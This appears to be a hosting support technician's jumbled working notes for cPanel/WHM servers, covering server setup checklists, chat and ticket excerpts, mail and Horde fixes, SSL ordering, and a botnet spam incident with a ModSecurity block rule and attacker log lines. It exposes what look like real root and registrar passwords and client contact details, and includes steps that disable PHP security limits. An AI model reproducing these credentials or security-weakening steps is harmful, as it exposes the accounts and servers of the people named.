pts/4 00:00:00 su 18738 pts/4 00:00:00 bash 18795 pts/5 00:00:00 su 18796 pts/5 00:00:00 bash 19144 pts/3 00:00:00 su 19150 pts/3 00:00:00 bash 22205 pts/4 00:00:00 ps [root@formula ~]# Moved file in home and follow following steos Main >> Backup >> Restore a Full Backup/cpmove file scp cpmove-phainswo.tar.gz root@oyster.site.com:/home/ rsync -avHP cpmove-abdturkc.tar.gz root@oyster.site.com:/home/ /var/lib/mysql --- /var/cpanel/userdata/username ---- /var/cpanel/users/username --- [5:09:46 PM] techsupportco6: /etc/alises/username [5:09:55 PM] techsupportco6: Move all these [5:22:16 PM] techsupportco6: rsync -acHP /var/cpanel/userdatat/usernamre root@hostname:/var/cpanel/userdata/ [6:47:14 PM] techsupportco6: 8904786377 http://www.rvsitebuilder.com/index.php/main/public/action/view/page/tutorials Support ticket : https://support.cpanellicense.com/support-center/index.php?x=&mod_id=4&t=4 ************************************************************ Issue : Tue, 20 April, 2010 9:49:01 AM [SB #BSU-66757-843]: Error when configure FAQ module using rvsitebuilder From: "helpdesk@cpanellicense.com" <helpdesk@cpanellicense.com> Add to Contacts To: whwtest@yahoo.com Dear whwtest@yahoo.com, This is an automated response to inform you that your ticket has been received, one of the staff members will review it and reply accordingly. Listed below are details of this ticket. -------Ticket Details------- Ticket ID: BSU-66757-843 Subject: Error when configure FAQ module using rvsitebuilder Department: RVSiteBuilder If you reply to this ticket, please make sure the Ticket ID remains in the subject at all times. You also be able to check the status or reply to this ticket online at: http://support.cpanellicense.com/support-center/index.php?x=&mod_id=5&ticket=BSU-66757-843 If you access to the system for the first time, please register using whwtest@yahoo.com as your contact email. If you already have an account but forgot password, please click 'Forgot Password?' link to request new password. Please do let us know if we can assist you any further, --~--~---------~--~----~------------~-------~--~----~ Web Experts Co.,Ltd. http://www.cPanelLicense.com http://www.RVSkin.com -- RV Global Soft Co.,Ltd. http://www.RVSiteBuilder.com --~--~---------~--~----~------------~-------~--~----~ RVSITE Builder Problem : I am facing the error when i try to configure FAQ module using rvsitebuilder into customised data base and getting the error like : > > > > > > URL : http://redwebhost.com.ar/rednomina/ > > > > > >Warning: require_once(/home/redwebho/.rvsitebuilder/seagull/lib/SGL/FrontController.php) [function.require-once]: failed to open stream: No such file or directory in /home/redwebho/public_html/rednomina/rvscommonfunc.php on line 114 > > > > > > Fatal error: require_once() [function.require]: Failed opening required '/home/redwebho/.rvsitebuilder/seagull/lib/SGL/FrontController.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/redwebho/public_html/rednomina/rvscommonfunc.php on line 114 Solution : Hello, We not do anything, because we still cannot SSH to your server. We just try to republish, and it's work. :) In the future, if the error comes again please try to force update using following commnad. rm -f /var/cpanel/rvglobalsoft/rvsitebuilder/var/INSTALL_COMPLETE.php rm -f /var/cpanel/rvglobalsoft/rvsitebuilder/rvsitebuilderversion.txt perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi perl /var/cpanel/rvglobalsoft/rvsitebuilder/panelmenus/cpanel/scripts/autofixphpini.pl /scripts/makecpphpFOR LICENCE ERROR : rm -f /var/cpanel/rvglobalsoft/rvsitebuilder/rvsitebuilder.lic rm -f /var/cpanel/rvglobalsoft/rvsitebuilder/rvsitebuilder-pro.lic perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi ================== licence error 67.23.226.189(67.23.226.189) is not found. We need to login rvsitebuilder account and select correct licence. ================== RVSite Builder Error : Warning: require_once(/home/vxentcom/.rvsitebuilder/seagull/lib/SGL/FrontController.php) [function.require-once]: failed to open stream: No such file or directory in /home/vxentcom/public_html/rvscommonfunc.php on line 114 Fatal error: require_once() [function.require]: Failed opening required '/home/vxentcom/.rvsitebuilder/seagull/lib/SGL/FrontController.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/vxentcom/public_html/rvscommonfunc.php on line 114 Please SSh to server as root and force update using this command. rm -f /var/cpanel/rvglobalsoft/rvsitebuilder/var/INSTALL_COMPLETE.php rm -f /var/cpanel/rvglobalsoft/rvsitebuilder/rvsitebuilderversion.txt perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi Disable safe_mode & openbase_dir with .htaccess php_admin_flag safe_mode off php_admin_value open_basedir nonePlease wait while we find an agent to assist you... You have been connected to Robert Lin. Robert Lin: hi talker: how do I get a thawte logo to put on my site with ssl installed Robert Lin: May I know what is the order number of your certificate request ? talker: hold on talker: 8509485 talker: domain www.katzeyezeyewear.com Robert Lin: ok this is the order number of your certificate : AUKATZ2 Robert Lin: you will need to use this order number to obtain the script for the site seal Robert Lin: This will help you to obtain the site seal : http://search.thawte.com/thawte/solution.jsp?id=vs4015 talker: let me check talker: ok thanks cat /etc/httpd/conf/httpd.conf > /usr/local/apache/htdocs/http.txtSteps for Server Configuration ========================================================== I >First login to poweradmin One and two (Add Supermaster zone) IP---new server IP Host name -- ns1.site.com or 1.nseasy.com Account : server name ex : accord II >After that Search Zone and Records ---site.com After that Edit and Add A record(Ip of the new server) III > After that open another shell(another server) and type vi /etc/named.conf Copy the line also-notify with IP address and semi colon and New server : vi /etc/named.conf Paste the also notify lines and save (:wq!) IV > On the shell of the new server, type useradd 3gteam passwd 3gteam Enter the password for 3gteam. Restart sshd V > Then vi /etc/group wheel:x:10:root,3gteam VI >Then vi /etc/ssh/sshd_config Remove # and enter port number 1097 Remove # and PermitRootlogin Yes Change to PermitRootlogin No In WHM, In ConfigServer Security & Firewall, Firewall Configuration and add the IP 1097 in TCP_IN and TCP_Out VII >Go to WHM >> ConfigServer Security & Firewall >> Check Server Security >> Check /tmp permissions , Check /var/tmp permissions, Check /usr/tmp permissions Change all permissions as given in WHM on the shell VIII >Check the php.ini file of the another server and compare it with the new server(Disable functions >> Just remove exec from the shell and restart apache ) IX >In WHM,, type Suexec, PHP and SuExec Configuration >> php 5 hander >>Drop down (select dso) and save changes X > Check in another server for mysql connection > vi /etc/my.cnf (the values should be same on the new server) XI >Go to http://configserver.net/ >> ConfigServer Mail Queues >> Right click >> wget http://configserver.net/free/cmq.tgz Then go down on the link ConfigServer Mail Queues (install.txt) >> Click >> On the shell >> tar -xzf cmq.tgz >> cd cmq/ >>sh install.sh Refresh WHM and you will see ConfigServer Mail Queues at the left side bottom Then open the link ConfigServer Mail Manage from http://configserver.net/ and wget the link ( wget http://configserver.net/free/cmq.tgz) ConfigServer Mail Manage >> install.txt >> Click On the shell tar -xzf cmm.tgz cd cmm/ sh install.sh Login to WHM and scroll to the bottom of the left hand menu and you should see "ConfigServer Mail Manage" If http command is not there on the server, then on the another server, type which http. You will get a path for http. Then go in that path by vi /bin/http and on the new server, go by cd /bin and vi http and copy the code from old server(vi /bin/http) XII >Open a Old server WHM and edit packages >> and add package on a new server and enter the values as it is. XIII >Then WHM >> Feature manager Add Excite >>Feature List Name >> Excite >> Add >> Remove Click Be as we do not provide Click Be XIV >>Create a account as vanessatestjade.com(Example) from WHM >> Create account >>Package Excite XV >> Then run the command /scripts/fixquotas on the server XVI >> Login to shell of Prime server(if the new server configured is of site), prime port is 22 and root as user /scripts/whoowns network-command.com cd public_html/status03(if adding in 3rd page ) vi config.php Add the new server in the server list XVI >> Check the entries of the new added domain (step XIV) In the PowerDNS 1 and 2 XVII >> WHM >> Tweak Settings >> When adding a new domain, automatically create A entries for the registered nameservers if they would be contained in the zone. >> Unselect XVIII > Correct the following block in httpd.conf according to the server: vi /etc/httpd/conf/httpd.conf Just above the second block (pid) place the following NameVirtualHost 67.23.226.97:80 (new server IP) <VirtualHost 67.23.226.169> ServerName accord.site.com DocumentRoot /usr/local/apache/htdocs </VirtualHost> Add one more option in configuration file http://67.23.226.139:2086/scripts6/do_edit_contact_info This we have to disable Go to WHM >> Support >> Configure Customer Contact >> Disable and save XIX >> cd /usr/local/apache/htdocs Search for the file serverstats_inc.php If not there, copy from any other server cat serverstats_inc.php Copy and paste on the new server Restart apache XX >> Change password on the shell with passwd Put any password Save Save in the Database In the data base Edit(Add Entry) Title(Server name) Username : IP Password : New one ==================================================== Checks : [1:14:07 PM] bluffer: - suPHP - Fantastico - RV SiteBuilder - Configure with NS: 1/2.nsjet.com 'clsuter' - NS entry for hostname in 1/2.nsjet.com - SSL on hostname & services - Temp url /~user - CSF - Root Login notification - Add to Stats - Add to Panopta - Packages are NOT required - Disable root login / Wheel user '3gteam' - Disable Customer Contact - Remove Supprot from Feature manager - Run AXOND script ( host dime script ) - Configure backup and setup cron - Install kernel script - tmp secure - Add commands --( killwhom, hload , http, check, blockdo ) ==================================================== server details [10:23:36 AM] bluffer: 1)Important Links accord.site.com Web Host Manager: https://67.23.226.169:2087 WHM Username: root WHM Password: k|4mJ:tPbf port :1157 directory "/var/named"; // the default dump-file "data/cache_dump.db"; statistics-file "data/named_stats.txt"; memstatistics-file "data/named_mem_stats.txt"; /* memstatistics-file "data/named_mem_stats.txt"; */ allow-transfer {"none";}; also-notify { 67.19.91.74; 66.7.219.224; }; }; Steps for Server Configuration ========================================================== I >First login to poweradmin One and two (Add Supermaster zone) IP---new server IP Host name -- ns1.site.com or 1.nseasy.com Account : server name II >After that Search Zone and Records ---site.com After that Edit and Add A record(Ip of the new server) III > After that open another shell(another server) and type vi /etc/named.conf Copy the line also-notify with IP address and semi colon and New server : vi /etc/named.conf Paste the also notify lines and save (:wq!) IV > On the shell of the new server, type useradd 3gteam passwd 3gteam Enter the password for 3gteam. V > Then vi/etc/group wheel:x:10:root,3gteam VI >Then /etc/ssh/sshd_config Remove # and enter port number 1097 Remove # and PermitRootlogin Yes Change to PermitRootlogin No In WHM, In ConfigServer Security & Firewall, Firewall Configuration and add the IP 1097 in TCP_IN and TCP_Out VII >Go to WHM >> ConfigServer Security & Firewall >> Check Server Security >> Check /tmp permissions , Check /var/tmp permissions, Check /usr/tmp permissions Change all permissions as given in WHM on the shell VIII >Check the php.ini file of the another server and compare it with the new server(Disabled functions >> Just remove exec from the shell and restart apache ) IX >In WHM,, type Suexec, PHP and SuExec Configuration >> php 5 hander >>Drop down (select dso) and save changes X > Check in another server for mysql connection > vi/etc/my.cnf (the values should be same on the new server) XI >Go to http://configserver.net/ >> ConfigServer Mail Queues >> Right click >> wget http://configserver.net/free/cmq.tgz Then go down on the link ConfigServer Mail Queues (install.txt) >> Click >> On the shell >> tar -xzf cmq.tgz >> cd cmq/ >>sh install.sh Refresh WHM and you will see ConfigServer Mail Queues at the left side bottom Then open the link ConfigServer Mail Manage from http://configserver.net/ and wget the link ( wget http://configserver.net/free/cmq.tgz) ConfigServer Mail Manage >> install.txt >> Click On the shell tar -xzf cmm.tgz cd cmm/ sh install.sh Login to WHM and scroll to the bottom of the left hand menu and you should see "ConfigServer Mail Manage" XII >Open a Old server WHM and edit packages >> and add package on a new server and enter the values as it is. XIII >Then WHM >> Feature manager Add Excite >>Feature List Name >> Excite >> Add >> Remove Click Be as we do not provide Click Be XIV >>Create a account as vanessatestjade.com(Example) from WHM >> Create account >>Package Excite XV >> Then run the command /scripts/fixquota on the server XVI >> Login to shell of Prime server(if the new server configured is of site), prime port is 22 and root as user /scripts/whoowns network-command.com cd public_html/status03(if adding in 3rd page ) vi config.php Add the new server in the server list XVI >> Check the entries of the new added domain (step XIV) In the PowerDNS 1 and 2 XVII >> WHM >> Tweak Settings >> When adding a new domain, automatically create A entries for the registered nameservers if they would be contained in the zone. >> Unselect XVIII > Correct the following block in httpd.conf according to the server: vi /etc/httpd/conf/httpd.conf NameVirtualHost 66.7.199.176:80(New Server IP) <VirtualHost 66.7.199.176>(New server IP) ServerName saint.site.com (New server name) DocumentRoot /usr/local/apache/htdocs </VirtualHost> XIX >> cd /usr/local/apache/htdocs Search for the file serverstats_inc.php If not there, copy from any other server cat serverstats_inc.php Copy and paste on the new server Restart apache XX >> Change password on the shell with passwd Put any password Save Save in the Database ==================================================== http://reports.panopta.com/MinMax.UptimeHow to Configure FileZilla 2.2.32 for Secure File Transfer Protocol (SFTP) - (Windows XP/Vista) Once correctly configured, FileZilla 2.2.32 supports secure file transfer protocol (SFTP) connections. Configuring FileZilla for SFTP Important: Before configuring FileZilla 2.2.32 to run in SFTP, check with your Local Support Provider (LSP) to ensure your School, Department, or administrative unit supports SFTP. Since the instructions below are basic, you should also check with your LSP for any special instructions that may apply. Start FileZilla 2.2.32 (Start All Programs FileZilla FileZilla 2.2.32). From the File menu, select Site Manager... . The Site Manager windows displays. Click the New Site button located in the bottom left corner of the window. A New FTP site icon appears beneath the My FTP Sites folder icon: In place of the displayed words New FTP site, type a descriptive name for your new SFTP site profile (e.g., myserver SFTP). Click in the Host field, then type the actual host name of the new SFTP site (e.g., myserver.upenn.edu). Beneath Servertype, click the down arrow and select SFTP using SSH2. Beneath Logontype, select the Normal radio button. In the User field, enter your username. Click the Save and Exit button at the bottom right of the window. You have successfully created an SFTP site profile. When you next connect to this new SFTP site, you will be prompted to enter your password after entering your username. Using FileZilla to Connect to the New SFTP Site for the First Time Start FileZilla 2.2.32 (Start All Programs FileZilla FileZilla 2.2.32). From the File menu, select Site Manager... . The Site Manager window displays. Beneath My FTP Sites, select the new SFTP site you just created (for example, myserver.upenn.edu); then press the Connect button. When prompted, enter your password in the dialog box. The first time only that you connect to your server, the a dialog box will display with a message stating that the server's host key is not cached in the registry, and asking to store key in cache? Click Yes to store the SSL certificate. Your Local Site files will now display in the left panel of the screen, and Remote SFTP Site files will display in the right panel of the screen. When finished, disconnect from the directory by selecting Disconnect from the File menu, and then select Exit from the File menu.chsh -s /usr/local/cpanel/bin/jailshell usershttp://www.xml-sitemaps.com/set keepalive off if sites are working slow on site despite load < 7 Horde Failed to connect to localhost:25 error message Horde Failed to connect to localhost:25 error message By Gunjan · August 6, 2010 On Shared server as well as on Dedicated server some time we are facing large connection issue to SMTP port 25 at that time mostly we disable SMTP port 25 and enable any other port for SMTP but after changing SMTP port mostly we receive following error message in Horde webmail. There was an error sending your message: Failed to connect to localhost:25 [SMTP: Invalid response code received from server (code: 421, response: Too many concurrent SMTP connections; please try again later.)] To resolve above error simply change SMTP port from 25 to new SMTP port in following file. root@server [/usr/local/cpanel/base/horde/imp/config]# Pico servers.php And change following line From ‘smtpport’ => 25, To ‘smtpport’ => 26, We have taken new port as 26 for example you can use any port as per your requirement. Similar problem with “Squirrelmail” then refer following steps. root@server [/usr/local/cpanel/base/3rdparty/squirrelmail/config]#pico config_default.php Change following line From $smtpPort = 25; To $smtpPort = 26; Save file and exit and now open the webmail. **************************************************** http://www.theperfectarts.com/SOAP enabled on : Air, Salute php -m session SimpleXML soap ---------------------> sockets SourceGuardian SPL standard tidy tokenizer wddx xml xmlreader xmlrpc xmlwriter xsl Zend Optimizer zip zlib /var/cpanel/users/username /scripts/updateuserdomains /var/named/domain.db /etc/named.conf /usr/local/apache/conf/httpd.conf /etc/localdomains /etc/userdomains /etc/trueuserdomains /etc/trueuserowners /etc/valiases/domain.com /etc/vdomainaliases/domain.com /etc/vfilters/domain.comSPAMMER ACTION CASE https://core.hostdime.com/support/view/id/115396 The following Mod Security rule will prevent the execution of the malicious script: ====== SecRule REQUEST_URI "/(l_)?backuptoster(_r)?\.php[345]?" "phase:1,block,deny,drop,id:19160115,log,msg:'Botnet Spam Script Request',status:406" ====== The previous text should be appended as a single line to the existing contents of the [/usr/local/apache/conf/modsec2.user.conf] file. The password of the [sabapalc] account should be changed (after unsuspension) and its operator notified that their systems are likely infected with botnet/other malware-class software and they should take action to remove it. The following IP ranges should be blocked at the server's firewall: ====== 204.45.121.104/29 204.45.119.96/29 ====== These IP ranges encompass the sources of this attack. Additionally, WHM offers a "SMTP Tweak" that can help reduce the likelihood of success of this kind of attack. If CSF is installed on this server, its "SMTP_BLOCK" functionality should be used instead. ========================== oot@salute [/home/sabapalc]# grep -ilr "backuptoste" * access-logs/saba-pal.com access-logs/ftp.saba-pal.com-ftp_log root@salute [/home/sabapalc]# vi access-logs/saba-pal.com 220.181.108.160 - - [06/Feb/2011:07:26:54 -0500] "GET / HTTP/1.1" 200 2053 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 204.45.121.106 - - [06/Feb/2011:13:02:57 -0500] "GET /l_backuptoster_r.php?id=3506&ipAddr=204.45.121.106&serv_name=www.saba-pal.com HTTP/1.1" 200 28 "-" "-" 204.45.121.106 - - [06/Feb/2011:13:02:58 -0500] "GET /l_backuptoster_r.php?id=3511&ipAddr=204.45.121.106&serv_name=www.saba-pal.com HTTP/1.1" 200 28 "-" "-" 204.45.121.106 - - [06/Feb/2011:13:02:56 -0500] "GET /l_backuptoster_r.php?id=3500&ipAddr=204.45.121.106&serv_name=w oot@salute [/home/sabapalc]# grep -ilr "backuptoste" * access-logs/saba-pal.com access-logs/ftp.saba-pal.com-ftp_log root@salute [/home/sabapalc]# vi access-logs/saba-pal.com 220.181.108.160 - - [06/Feb/2011:07:26:54 -0500] "GET / HTTP/1.1" 200 2053 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 204.45.121.106 - - [06/Feb/2011:13:02:57 -0500] "GET /l_backuptoster_r.php?id=3506&ipAddr=204.45.121.106&serv_name=www.saba-pal.com HTTP/1.1" 200 28 "-" "-" 204.45.121.106 - - [06/Feb/2011:13:02:58 -0500] "GET /l_backuptoster_r.php?id=3511&ipAddr=204.45.121.106&serv_name=www.saba-pal.com HTTP/1.1" 200 28 "-" "-" 204.45.121.106 - - [06/Feb/2011:13:02:56 -0500] "GET /l_backuptoster_r.php?id=3500&ipAddr=204.45.121.106&serv_name=w ========================== http://old.openspf.org/wizard.html http://www.microsoft.com/mscorp/safety/content/technologies/senderid/wizard/default.aspx Also Check all these URL's http://support.uk-vps.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=10 http://www.mycutelife.net/sanju/help1/mailissue http://helpdesk.hostmonster.com/index.php/kb/article/372 Error from Squirremail : 1)grep -rl ahoo.co.in /var/spool/exim/input/ | xargs rm this will delete the mails from ythe queue which consist of ahoo.co.in ******************************************************************************************************** 2) exim -bp |exiqsumm exim -bp | exiqsumm | awk '{if ($1 >100)print $0 }' | sort -n this will show the no of mails for each domain to find who is sending mails ps -C exim -fH eww ******************************************************************************************************** 3) error in webmail ----------------------------- Email delivery error Server replied: 1 Can't execute command '/usr/local/cpanel/bin/sendmail_cpanel -i -t -ftest@domainname.com'. ----------------------------- Email delivery error Server replied: 255 Can't execute command '/usr/local/cpanel/bin/sendmail_cpanel -i -t -ftest@philadelphiamaven.com'. ----------------------------- Can't execute command '/usr/local/cpanel/bin/sendmail_cpanel -i -t -f in squirrelmail Solution Quite a hard one to track down this one :- First SSH into your server and run :- /scripts/fixeverything /scripts/upcp --force /scripts/eximup --force if that does not fix the issue run the following commands:- cd /usr/sbin mv sendmail sendmail.157979 ln -s /usr/sbin/exim /usr/sbin/sendmail mv /etc/eximmailtrap /etc/eximmailtrap.157979 All sorted, it should be. one more fix is given below. root@abc [~]# cd /usr/sbin root@abc [/usr/sbin]# mv sendmail sendmail.157979 root@abc [/usr/sbin]# ln -s /usr/sbin/exim /usr/sbin/sendmail root@abc [/usr/sbin]# mv /etc/eximmailtrap /etc/eximmailtrap.157979 Exim e-mail filtering doesn't work for maildir Currently cpanel e-mail filtering only supports mbox format. Here is a workaround for maildir ############################### vi /etc/exim.conf Under DIRECTORS CONFIGURATION (there are two section file_transport under DIRECTORS CONFIGURATION. Just add the below line with the first file_transport = address_file section.) Under file_transport = address_file add the line directory_transport = address_directory example----->> -------------------------------------- central_filter: #!!# filter renamed allow_filter driver = redirect allow_filter no_check_local_user file = /etc/vfilters/${domain} file_transport = address_file directory_transport = address_directory pipe_transport = virtual_address_pipe reply_transport = address_reply retry_use_local_part user = "${lookup{$domain}lsearch* {/etc/userdomains}{$value}}" no_verify -------------------------------------- Under TRANSPORTS CONFIGURATION add the following lines address_directory: debug_print = "T: address_directory for $local_part@$domain" driver = appendfile envelope_to_add = true return_path_add = true check_string = "" escape_string = "" maildir_format chattr +ia /etc/exim.conf /etc/init.d/exim restart &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& mbox to maildir conversion of single account working one is the first =========================================================================== Use this custom script to convert single mbox files to maildir format Convert mbox to maildir wget http://batleth.sapienti-sat.org/projects/mb2md/mb2md-3.20.pl.gz gunzip mb2md-3.20.pl.gz ./mb2md-3.20.pl -s path_to_inbox =========================================================================== download this http://perfectmaildir.home-dn.net/perfect_maildir/perfect_maildir.pl usage ./perfect_maildir.pl ~Maildir/ <mbox.file one example is given below ./perfect_maildir.pl /home/harrison/mail/cur < /home/harrison/mail/inbox &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& http://forums.cpanel.net/showthread.php?t=54012&highlight=address+book error No browseable address books fix Edit the file: /usr/local/cpanel/base/horde/turba/config/sources.php on the server with your favorite command line editor. Look for a line of code that reads like: Code: 'public' => false, 'readonly' => false, 'admin' => array(), 'export' => true Should be around line 132 I believe. Add 'browse' => true, to this section of code, so that it reads as: Code: 'public' => false, 'readonly' => false, 'admin' => array(), 'browse' => true, 'export' => true Then just save the file and log back into Horde. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& ------------------------------------------------------------ loops back to login page in horde solution mysql mysql> use horde; mysql> drop table horde_sessionhandler; mysql> CREATE TABLE horde_sessionhandler ( session_id VARCHAR(32) NOT NULL, session_lastmodified INT NOT NULL, session_data LONGBLOB, PRIMARY KEY (session_id) ) ENGINE = InnoDB; ------------------------------------------------------------ &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& address book missing http://forums.cpanel.net/showthread.php?t=43342&highlight=address+book I found the error I had was caused by a wrongly named file in: /usr/local/cpanel/base/horde/turba/scripts/upgrades/ 1.2_to_2.0.sql should have been 1.2_to_2.0.mysql.sql To fix: cd /usr/local/cpanel/base/horde/turba/scripts/upgrades/ If the file is wrongly named, rename it: mv 1.2_to_2.0.sql 1.2_to_2.0.mysql.sql Or scp it over from another server with the correct filename /usr/local/cpanel/bin/updatehorde &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& horde issue login page again and again if you recently made changes to your my.cnf file, see if you have skip-innodb if do, comment it out. #skip-innodb Reply With Quote squirrelmail error missing folders solution http://squirrelmail.org/wiki/MissingFolders Check Options->Folder Preferences->Show only subscribed folders. Try subscribing to those folders. Click "Folders" choose you folder(s), you can do multi-select, and click "Subscribe." If this does not work it may be because SquirrelMail is configured for the wrong type of IMAP server, or does not support your IMAP server. If the folders were not even listed, it is quite possible that they were stored on your local machine. Fire up your old mail reader and move the folders back onto the IMAP server. Admins, please note that if your IMAP server is not listed that does NOT mean that it won't work. It just means that there are no "special" options (a.k.a. work-arounds) for your particular server. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& spamassaqssin upgrade vi /home/.cpcpan/modules.versions then change the version /scripts/installspam &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& /scripts/convert2maildir is not working. change the entry courier to 0 in /var/cpanel/cpanel.config &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& Hello, The issue is that, previously server was running with mbox format with mails. Now these days cpanel is supporting maildir format as mbox is having many reported issues. In mbox format Individual messages are simply concatenated together, and saved in a single file. A special marker is placed where one message ends and the next message begins. Only one process can access the mbox file in read/write mode. Concurrent access requires a locking mechanism. Anytime someone needs to update the mbox file, everyone else must wait for the update to complete. In maildir format Individual messages are saved in separate files, one file per message. There is a defined method for naming each file. There's a defined procedure for adding new messages to the maildir. No locking is required. Multiple processes can use maildirs at the same time. We are running the script to convert all mbox formatted mails to maildir format so as to fix the mail issue and it will take some more time for the completition. We really sorry for the inconvenience caused and we will update you once this is over. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& squirrelmail issue ERROR: Connection dropped by IMAP server Courier-IMAP is linked against libfam, and that library is probably missing. Use SSH for the following: How to check root@server# ldd /usr/lib/courier-imap/bin/imapd libfam.so.0 => not found libgdbm.so.2 => /usr/lib64/libgdbm.so.2 (0x0000002a9566c000) libcourierauth.so.0 => /usr/lib64/courier-authlib/libcourierauth.so.0 (0x0000002a95772000) libc.so.6 => /lib64/tls/libc.so.6 (0x0000002a9587c000) /lib64/ld-linux-x86-64.so.2 (0x0000002a95556000) How to fix root@server# yum install gamin &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&ssl logs SSL error root@saint [/home/3gteam]# /scripts/ssl_crt_statusFetching SSL from shell go to cd /etc cd ssl cd certs cat domainname.csr Ex cat balihaitours.com.csr Also same for key cd /etc/ssl/private cat domainname.com.key Ex. cat balihaitours.com.key SSL Installation : 1 St Step : Once the client has paid $73 for SSL installations and dedicated : give him following reply and ask him to provide the details to generate the CSR for the domain. and meanwhile assign the dedicated IP for his domain. 1st Reply : Hello, We have assigned dedicated IP 66.7.221.91 for your domain glassbasins.co.uk and the domain witll take 1 to 2 hours to resolve with dedicated IP. In order to get your site work with https, you will need to install ssl certificate for your domain. Please provide us following information, we will then generate certificate signing requiest for you, you will need to provide this csr to certificate authority and purchase certificate. Contact Info Email Address the Cert will be sent to: amit@glassbasins.co.uk Cert Info (this will be displayed when a user connects) Host to make cert for Country (2 letter Abbrivation): UK. State: Wembley City: Middlesex Company Name: Glassbasins Limited Company Division:Sales Email:sales@glassbasins.co.uk Password:glass7basins ----------------------------------------------------------------------------------------------------------------------------------------------------- 2. Once he has provide us the details as above , then next step is to create the CSR. - Generate the ssladmin email account from client's cpanel having the email details given below : Email id : ssladmin@glassbasins.co.uk Password : ssladmin - login into server's WHM >> open Generate a SSL Certificate and Signing Request section - Email Address the Cert will be sent to : team@site.com - Email: client's email id provided in th info for creation of CSR - Fill all the info provided in preveous email. - Country (2 letter abbreviation): Ex. UK - once you fill all the info - click on "Create": button - It will generate the CSR like : Certificate Request and Key for glassbasins.co.uk CSR email sent to team@site.com -----BEGIN CERTIFICATE REQUEST----- MIICAzCCAWwCAQAwgaUxCzAJBgNVBAYTAlVLMRAwDgYDVQQIEwdXZW1ibGV5MRIw EAYDVQQHEwlNaWRkbGVzZXgxHDAaBgNVBAoTE0dsYXNzYmFzaW5zIExpbWl0ZWQx DjAMBgNVBAsTBVNhbGVzMRowGAYDVQQDExFnbGFzc2Jhc2lucy5jby51azEmMCQG CSqGSIb3DQEJARYXc2FsZXNAZ2xhc3NiYXNpbnMuY28udWswgZ8wDQYJKoZIhvcN AQEBBQADgY0AMIGJAoGBANB4nlBfSCkyu9I8H4PJCgE1dMhGjQT3ZCsZDoib+Qyl BxOg9SDvV1ySORtYCbJfw3AHK3/pJKcvDvb/niz/FZIeAICHT6E2BMgKI7wcXD22 1LbtMXuf6bR4K7PdyegJ9i9NIboL2rldMQ0bEhHcvTmrvfXI6aXB/i9VvqTKIxEn AgMBAAGgHTAbBgkqhkiG9w0BCQcxDhMMZ2xhc3M3YmFzaW5zMA0GCSqGSIb3DQEB BQUAA4GBAHQCzJZ+hGJsPTR5X4YEEhd10Tcbt95YhVnOo3cyY5YrrzUjIDMe+LAS kE5e+Fhmz3aWLGCFy9Bi9z6dIVOOiiImdZStGKHhWDkRr2SasSG/4YO0NoVScNQT xloJg4XM/8oTjYU6uHQjOrlQyJ69pTylKfMiXE4kR0XGJUJIVKe2 -----END CERTIFICATE REQUEST----- this will be from first box : Signing Request ----------------------------------------------------------------------------------------------------------------------------------------------------- 3rd Step : Login to Enom at http://enom.com - Username : vicks - Password : v383vj9j - Go to >> SSL certificates >> Manage . - you will see the Type Domain Status Expiration RapidSSL Awaiting Configuration 9/21/2010 - Click on RapidSSL - Click on "Outside Hosting" - It will provide you the box to put the CSR - Select web server as : cPanel - Put the CSR - Click on purchase - Select an approval email for this certificate and set the emails account which was created in 2nd step. - the status will change to Type Domain Status Expiration RapidSSL glassbasins.co.uk Processing 9/21/2010 - Now it will take 2-3 hours to get the confirmation to approve it. - Add the note in the ticket like : I have ordered SSL for : glassbasins.co.uk at Enom. Approval email address set to : ssladmin@glassbasins.co.uk Password : ssladmin . ----------------------------------------------------------------------------------------------------------------------------------------------------- 4th Step : ----------------------------------------------------------------------------------------------------------------------------------------------------- SSL Certificate Installation __________________________________________________________________________ Introduction Refers to the digital certificate used with the most popular security protocol on the Internet. When you make a purchase on the Web and notice the closed lock icon at the top or bottom of your browser or the HTTPS:// prefix in the URL, it means you have established a secure SSL connection. Your browser has examined the signed certificate received from the Web site, determined it to be authentic and secret keys have been computed at both ends of the connection. All the information you enter online is encrypted before being sent to the server 1 - SSL Certificate creation with cPanel WHM a. Open a Web browser and navigate to: https://serverIP:2086 b. Enter your root user name and the password that you specified when you set up your account c. Click OK. d. Click Generate a SSL Certificate and Signing Request through the Web SSL/TLS menu e. Enter the following information: -Email address (where cert is sent) -Host name -Country -State -City -Company Name -Company Division -Email address (displayed in cert) -Password f. Click Create. Your 